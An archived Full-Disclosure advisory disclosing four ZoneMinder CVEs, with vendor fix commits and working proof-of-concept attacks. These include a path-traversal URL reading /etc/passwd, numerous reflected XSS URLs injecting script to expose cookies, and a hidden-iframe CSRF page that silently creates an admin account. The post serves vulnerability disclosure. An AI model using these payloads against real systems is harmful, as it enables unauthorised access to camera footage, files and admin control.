lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4cffa32d-4f62-142c-7889-86913a02e6b5@terabyteit.com.au>
Date: Sun, 5 Feb 2017 11:22:18 +1100
From: John Marzella <john@...abyteit.com.au>
To: fulldisclosure@...lists.org
Subject: [FD] ZoneMinder - multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

==========================================================================
Product: ZoneMinder
Versions: Multiple versions - see inline
Vulnerabilities: File disclosure, XSS, CSRF, Auth bypass & Info disclosure
CVE-IDs: CVE-2017-5595, CVE-2017-5367, CVE-2017-5368, CVE-2016-10140
Author: John Marzella
Date: 03/02/2017
==========================================================================



CVE-2016-10140 - Auth bypass and Info disclosure - affects v1.30 and v1.29
==========================================================================
Contacted vendor on 08/11/2016

Apache HTTP Server configuration bundled with ZoneMinder allows a remote 
unauthenticated attacker to browse all directories
in the web root, e.g., a remote unauthenticated attacker can view all 
CCTV images on the server.

PoC: http://<serverIP>/events

Fix: 
https://github.com/ZoneMinder/ZoneMinder/commit/71898df7565ed2a51dfe76a1cf30ddb81fc888ba



CVE-2017-5595 - File disclosure - affects v1.xx - code from 2008
================================================================
Contacted vendor on 22/01/2017

File disclosure and inclusion vulnerability exists in ZoneMinder v1.30.0 
due to unfiltered user-input being passed to readfile() in 
views/file.php which allows an authenticated attacker to read local 
system files (e.g. /etc/passwd) in the context of the web server user 
(www-data).

PoC: 
http://<serverIP>/zm/index.php?view=file&path=/../../../../../etc/passwd

Fix: 
https://github.com/ZoneMinder/ZoneMinder/commit/8b19fca9927cdec07cc9dd09bdcf2496a5ae69b3



CVE-2017-5367 - XSS - affects v1.30 and v1.29
=============================================
Contacted vendor on 20/11/2016

Multiple reflected XSS exists.

The following has been injected into vulnerable URL’s to show that the 
users session cookie can be stolen.
%3Cscript%3Ealert(document.cookie);%3C/script%3E

In form input view using POST at http://<serverIP>/zm/
PoC: 
http://<serverIP>/zm/index.php?action=login&view=postlogin%3Cscript%3Ealert(document.cookie);%3C/script%3E&postLoginQuery=1&username=testuser&password=testpassword 


In link input view using GET at http://<serverIP>/zm/
PoC: 
http://<serverIP>/zm/?view=groups%3Cscript%3Ealert(document.cookie);%3C/script%3E 


In link input filter[terms][1][cnj] using GET at http://<serverIP>/zm/
PoC: 
http://<serverIP>/zm/?view=events&page=1&filter[terms][0][attr]=DateTime&filter[terms][0][op]=%3E%3D&filter[terms][0][val]=-1%2Bhour&filter[terms][1][cnj]=and%3Cscript%3Ealert(document.cookie);%3C/script%3E&filter[terms][1][attr]=MonitorId&filter[terms][1][op]=%3D&filter[terms][1][val]=1 


In form input view using GET at http://<serverIP>/zm/index.php
PoC: 
http://<serverIP>/zm/index.php?view=console%3Cscript%3Ealert(document.cookie);%3C/script%3E&action=1&addBtn=Add%20New%20Monitor&editBtn=Edit&deleteBtn=Delete&markMids[]=2 


In form input filter[terms][1][cnj] using POST at 
http://<serverIP>/zm/index.php
PoC: 
http://<serverIP>/zm/index.php?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=Archived&filter%5Bterms%5D%5B0%5D%5Bop%5D=%3D&filter%5Bterms%5D%5B0%5D%5Bval%5D=1&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and%3Cscript%3Ealert(document.cookie);%3C/script%3E&filter%5Bterms%5D%5B1%5D%5Battr%5D=MonitorId&filter%5Bterms%5D%5B1%5D%5Bop%5D=%3D&filter%5Bterms%5D%5B1%5D%5Bval%5D=1 


In form input filter[terms][1][cnj] using POST at http://<serverIP>/zm/
PoC: 
http://<serverIP>/zm/?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=DateTime&filter%5Bterms%5D%5B0%5D%5Bop%5D=&filter%5Bterms%5D%5B0%5D%5Bval%5D=-1+hour&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=%3Cscript%3Ealert(document.cookie);%3C/script%3Eand&filter%5Bterms%5D%5B1%5D%5Battr%5D=MonitorId&filter%5Bterms%5D%5B1%5D%5Bop%5D==&filter%5Bterms%5D%5B1%5D%5Bval%5D=1

In form input limit using POST at http://<serverIP>/zm/index.php
PoC: 
http://<serverIP>/zm/index.php?view=events&action=1&page=1&filter[terms][0][attr]=DateTime&filter[terms][0][op]=%3E%3D&filter[terms][0][val]=-1%2Bmonth&sort_field=StartTime&sort_asc=1&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E 


In link input limit using GET at http://<serverIP>/zm/index.php
PoC: 
http://<serverIP>/zm/index.php?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=DateTime&filter%5Bterms%5D%5B0%5D%5Bop%5D=%3E%3D&filter%5Bterms%5D%5B0%5D%5Bval%5D=-1%2Bmonth&sort_field=Id&sort_asc=0&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E 


In form input limit using POST at http://<serverIP>/zm/
PoC: 
http://<serverIP>/zm/?view=events&action=1&page=1&sort_field=StartTime&sort_asc=1&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E 


In link input limit using GET at http://<serverIP>/zm/
PoC: 
http://<serverIP>/zm/?view=events&page=1&sort_field=Id&sort_asc=0&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E



CVE-2017-5368 - CSRF - affects v1.30 and v1.29
==============================================
Contacted vendor on 20/11/2016

No CSRF protection exists across entire web app.

PoC: The following html page silently adds a new admin user to 
Zoneminder if the admin user is already logged in.

csrf_poc_addUser.html

<!-- Example of silent CSRF using iframe -->
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action="http://<serverIP>/zm/index.php" 
target="csrf-frame" id="csrf-form">
   <input type="hidden" name="view" value="user"/>
   <input type="hidden" name="action" value="user"/>
   <input type="hidden" name="uid" value="0"/>
   <input type="hidden" name="newUser[MonitorIds]" value=""/>
   <input type="hidden" name="newUser[Username]" value="attacker1"/>
   <input type="hidden" name="newUser[Password]" value="Password1234"/>
   <input type="hidden" name="conf_password" value="Password1234"/>
   <input type="hidden" name="newUser[Language]" value="en_gb"/>
   <input type="hidden" name="newUser[Enabled]" value="1"/>
   <input type="hidden" name="newUser[Stream]" value="View"/>
   <input type="hidden" name="newUser[Events]" value="Edit"/>
   <input type="hidden" name="newUser[Control]" value="Edit"/>
   <input type="hidden" name="newUser[Monitors]" value="Edit"/>
   <input type="hidden" name="newUser[Groups]" value="Edit"/>
   <input type="hidden" name="newUser[System]" value="Edit"/>
   <input type="hidden" name="newUser[MaxBandwidth]" value="high"/>
</form>
<script>document.getElementById("csrf-form").submit()</script>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBAgAGBQJYlm6PAAoJEA6vWorZiWpjfdgP/25I6nicsAHEF2mFw070Y76O
wUx9Epy5e4YJthdPn0zt/Vp/jg6MyT4I9sYBeqoZo64WNfO0mefiIBi/g3bMr9pt
rmDwAx3QWi+HYO8qAF5bJ7uaGbC7+nVXoSeKCeAQDADVCt6lSTejkZo9YcJsHO6S
nhDQ3NWCOy6LAQvPRBetomTQWlQzUJlVuk515ynrMhzJiRpglPajJc+ef8QVkPp8
//JOSELjYjVXDNQagW1C54aMXAmFk5qQIJHnXWjGT+pR4f42ldCWzNaNERTFXKkd
WlViLULT6GaIJ9jbHE8A1LxfwHkGo304eas3mi8Hk3bItBZ+Ly551ombM6Sa5pnu
SG4n6RsxXkxWWf5Nb4BcapNYMrdCOnPShm6DOKQB3yw/5+XSVgIJp4ZEXcM9Nseb
0OMLVg5jWSuZZZMvm+5KDjaZEzyCF8bHtQpTozx8RqbV49wz0So+DROjauP2CFI1
FkYc/4FoZYdpH+RFjwPV3sqYSXKpV4zdR2KzmnKGIj5fqrTIZL5V3/kA5LoaqBzu
hb5qun5kJLGx+2/7CEUaulDL43mnGZqrF2M1UT6MVkWbLaqhMNuMXXpJ72MhFhA+
EtxvUuVl4KaORlGx+ycAhc5AJ7/Y6T7estEVcjo3RUTORF82MxXcoZk1Y6J7ue2m
VX0oYa15mgdhrbjdE8tX
=TE/v
-----END PGP SIGNATURE-----



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ